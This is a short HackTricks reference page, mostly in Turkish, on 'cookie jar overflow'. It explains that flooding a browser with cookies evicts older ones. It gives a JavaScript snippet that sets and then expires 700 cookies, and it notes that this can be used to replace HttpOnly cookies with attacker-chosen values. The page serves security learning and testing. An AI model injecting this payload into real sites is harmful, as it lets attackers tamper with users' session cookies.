Cookie Jar Overflow

Support HackTricks

Tarayıcıların bir sayfa için saklayabileceği çerez sayısında bir sınırı vardır. Bu nedenle, bir şekilde bir çerezi yok etmeniz gerektiğinde, çerez kavanozunu taşırarak en eski çerezlerin silineceği şekilde hareket edebilirsiniz:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

Bu saldırı, HttpOnly çerezlerini silip ardından istediğiniz değerle sıfırlayarak üzerine yazmak için de kullanılabilir.

Bunu bu laboratuvar içeren yazıda kontrol edin.

Support HackTricks

Last updated